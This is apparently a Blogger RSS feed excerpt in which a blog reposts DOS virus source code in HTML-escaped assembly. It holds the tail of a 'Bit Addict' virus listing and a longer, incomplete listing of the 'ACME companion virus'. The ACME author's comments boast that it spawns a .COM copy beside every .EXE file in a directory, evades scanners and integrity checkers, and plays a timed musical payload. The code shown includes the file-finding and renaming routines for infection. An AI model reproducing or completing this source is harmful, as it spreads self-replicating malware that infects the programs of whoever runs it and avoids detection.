ExeIP&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; Header[14h]&lt;br /&gt;
ExeCS&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; Header[16h]&lt;br /&gt;
&lt;br /&gt;
DosInt21&amp;nbsp;&amp;nbsp;&amp;nbsp; dd&amp;nbsp;&amp;nbsp;&amp;nbsp; 0&lt;br /&gt;
OldInt21&amp;nbsp;&amp;nbsp;&amp;nbsp; dd&amp;nbsp;&amp;nbsp;&amp;nbsp; 0&lt;br /&gt;
OldInt1&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; dd&amp;nbsp;&amp;nbsp;&amp;nbsp; 0&lt;br /&gt;
&lt;br /&gt;
File1&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; dw&amp;nbsp;&amp;nbsp;&amp;nbsp; 36 dup(0)&lt;br /&gt;
File2&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; dw&amp;nbsp;&amp;nbsp;&amp;nbsp; 36 dup(0)&lt;br /&gt;
&lt;br /&gt;
VirusEnd&amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; $&lt;br /&gt;
&lt;br /&gt;
cseg ends&lt;br /&gt;
&lt;br /&gt;
sseg segment stack&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; db&amp;nbsp;&amp;nbsp;&amp;nbsp; 200h dup(1)&lt;br /&gt;
sseg ends&lt;br /&gt;
&lt;br /&gt;
end Begin</description><link>http://programmelk.blogspot.com/2012/03/bit-addict-versie-9-de-macros-hieronder.html</link><author>noreply@blogger.com (Lahiru Dilranga Silva)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG3co2d3HqB2eWvWmjgv9YrGURVhrUwaaCkQJi-uCI0yWiFwYFDpnZS4ui2Vv_gWL7uyWY8BH02Sju4ZRxjEb2bs7IiZcUgXwbcTUM29ywsjZdODEkDzrYo0mLbsl8XRIBvf6OXxzbmwM/s72-c/image+virus+2.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3391098358149587733.post-5587679788644267852</guid><pubDate>Thu, 01 Mar 2012 08:43:00 +0000</pubDate><atom:updated>2012-03-01T04:14:04.213-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">VB</category><category domain="http://www.blogger.com/atom/ns#">Virus</category><title>ACME COMPANION VIRUS</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;img border="0" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwn6oHoRyfjzt5beCuIzm8YjzO1QiStOP0BVWZQsTZ2CJ1n6PwEHGujwQve6y9dTnWMw4P_sN76znI9HQCgwLXKzvEvV2ROr1RgPpIL0F32if2kIn1_DRHuFbPkjxp8LrdXLUmHH8eI68/s320/image+virus+copy.jpg" width="320" /&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
; ACME COMPANION VIRUS&lt;br /&gt;
;&lt;br /&gt;
; ACME is a fast and simple companion virus which will create a&lt;br /&gt;
; spawned copy of itself for EVERY .EXE file it can find in the&lt;br /&gt;
; current directory. &lt;br /&gt;
;&lt;br /&gt;
; ACME is ready to assemble using A86. If you recall, an earlier Crypt&lt;br /&gt;
; letter included an A86-only source listing. (Strict TASM/MASM compatible &lt;br /&gt;
; assemblers will need the manual addition of a couple simple declarative &lt;br /&gt;
; statements.) I included ACME in this form so fans of Isaacson's &lt;br /&gt;
; technique can gloat about the code not requiring "red tape." ;-]&lt;br /&gt;
; A86 will assemble ACME directly to a .COMfile virus, no linker&lt;br /&gt;
; necessary.&lt;br /&gt;
; &lt;br /&gt;
; ACME currently eludes all scanners and as a companion virus, openly&lt;br /&gt;
; defies every integrity checker I have in my inventory with the EXCEPTION&lt;br /&gt;
; of Stiller Research's.&amp;nbsp; This issue includes a quality report on&lt;br /&gt;
; Solomon's Toolkit, so it's only fair to state that while the documentation&lt;br /&gt;
; for this product seems to indicate that the developers know what a &lt;br /&gt;
; companion infection is, the software does nothing to protect against&lt;br /&gt;
; it in default mode. ACME flies through the Toolkit, for now. Go figure.&lt;br /&gt;
;&lt;br /&gt;
; ACME will also play a generic ACME-style virus tune late in the&lt;br /&gt;
; afternoon. Those who fancy a musical virus but have never heard one are&lt;br /&gt;
; encouraged to play with ACME. Set your system clock to anytime after&lt;br /&gt;
; 4:00 pm. The musical payload takes up most of the space in this virus,&lt;br /&gt;
; removing it shaves the virus to 242 bytes - nice and small if you like.&lt;br /&gt;
;&lt;br /&gt;
; The virus purist may recognize the root of ACME as a piece of code known&lt;br /&gt;
; as ZENO - a small, single-step companion infector. ZENO's author is&lt;br /&gt;
; thanked, wherever he/she is.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
START:&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; jmp&amp;nbsp; VIR_BEGIN&amp;nbsp;&amp;nbsp;&amp;nbsp; ; get going&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
WILDCARD&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; DB&amp;nbsp; "*.EXE",0&lt;br /&gt;
FILE_EXT&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; DB&amp;nbsp; "COM",0&lt;br /&gt;
FILE_FOUND&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; DB&amp;nbsp; 12 DUP(' '), 0&lt;br /&gt;
FILE_CREATE&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; DB&amp;nbsp; 12 DUP(' '), 0&lt;br /&gt;
SEARCH_ATTRIB&amp;nbsp;&amp;nbsp; DW&amp;nbsp; 17H&lt;br /&gt;
NUM_INFECT&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp; 0&lt;br /&gt;
MUZIK&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4304,0006, 4063,0006, 4304,0006, 4063,0006, ;MUZIK - notes/delay&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3043,0006, 4831,0006, 4063,0006, 3043,0006, ;in format xxxx,yyyy&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4304,0006, 4063,0006, 4304,0006, 4063,0006,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3043,0006, 4831,0006, 4063,0006, 3043,0006, &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4304,0006, 4063,0006, 4304,0006, 4063,0006,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3043,0006, 4831,0006, 4063,0006, 3043,0006, &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4304,0006, 4063,0006, 4304,0006, 4063,0006,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3043,0006, 5119,0006, 5423,0006, 3043,0006, &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 6087,0020, &lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 6087,0006, &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 7239,0006, 3619,0006, 4831,0006, 6087,0006&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 7670,0006, 7239,0006, 4831,0006, 3619,0006&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 6087,0006, 4063,0006, 3043,0006, 5119,0006&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4831,0006, 6087,0006, 7239,0006, 8126,0006&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 6087,0020, &lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4304,0006, 4063,0006, 4304,0006, 4063,0006,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3043,0006, 4831,0006, 4063,0006, 3043,0006, &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4304,0006, 4063,0006, 4304,0006, 4063,0006,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3043,0006, 4831,0006, 4063,0006, 3043,0006, &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4304,0006, 4063,0006, 4304,0006, 4063,0006,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3043,0006, 5119,0006, 5423,0006, 3043,0006, &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 6087,0020, &lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 6087,0006, &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 7239,0006, 3619,0006, 4831,0006, 6087,0006&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 7670,0006, 7239,0006, 4831,0006, 3619,0006&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 6087,0006, 4063,0006, 3043,0006, 5119,0006&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4831,0006, 6087,0006, 7239,0006, 8126,0006&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 6087,0020, &lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 7670,0006, 7239,0006, 4831,0006, 3619,0006&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3043,0006, 3619,0006, 4831,0006, 6087,0006&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3043,0010, &lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4304,0006, 4063,0006, 4304,0006, 4063,0006,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3043,0006, 4831,0006, 4063,0006, 3043,0006, &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4304,0006, 4063,0006, 4304,0006, 4063,0006,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3043,0006, 4831,0006, 4063,0006, 3043,0006, &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4304,0006, 4063,0006, 4304,0006, 4063,0006,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3043,0006, 5119,0006, 5423,0006, 3043,0006, &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 6087,0020, &lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 7670,0006, 7239,0006, 4831,0006, 3619,0006&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3043,0006, 3619,0006, 4831,0006, 6087,0006&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 3043,0010, &lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 6087,0006, &lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 7239,0006, 3619,0006, 4831,0006, 6087,0006&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 7670,0006, 7239,0006, 4831,0006, 3619,0006&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 6087,0006, 4063,0006, 3043,0006, 5119,0006&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 4831,0006, 6087,0006, 7239,0006, 8126,0006&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 6087,0020, &lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; DW&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 0ffffh&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
My_Cmd:&lt;br /&gt;
CMD_LEN&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; DB&amp;nbsp; 13&lt;br /&gt;
FILE_CLONE&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; DB&amp;nbsp; 12 DUP (' '), 0&lt;br /&gt;
&lt;br /&gt;
;------------------------------------------------------------------;&lt;br /&gt;
Prepare_command:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; cld&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; di,OFFSET FILE_CLONE&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; al,0&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,12&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; repne scasb&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; find the end of string \0&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; al,0Dh&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; &amp;lt;CR&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; stosb&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ; replace \0 with a &amp;lt;CR&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,12&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;store length of the command&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; sub&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,cx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; CMD_LEN, al&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ret&lt;br /&gt;
&lt;br /&gt;
;------------------------------------------------------------------;&lt;br /&gt;
Store_name:&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; di,OFFSET FILE_FOUND&amp;nbsp;&amp;nbsp; ;Point to buffer.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; si,158&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;stow the file found in buffer&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,12&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; rep movsb&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; di,OFFSET FILE_CREATE&amp;nbsp; ;Point to buffer.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; si,158&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,12&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; rep movsb&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; cld&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; di,OFFSET FILE_CREATE&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; al,'.'&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,9&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; repne scasb&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;find the '.'&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; si,OFFSET FILE_EXT&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,3&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; rep movsb&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;replace the .EXE with .COM&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ;from buffer&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ret&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
;------------------------------------------------------------------;&lt;br /&gt;
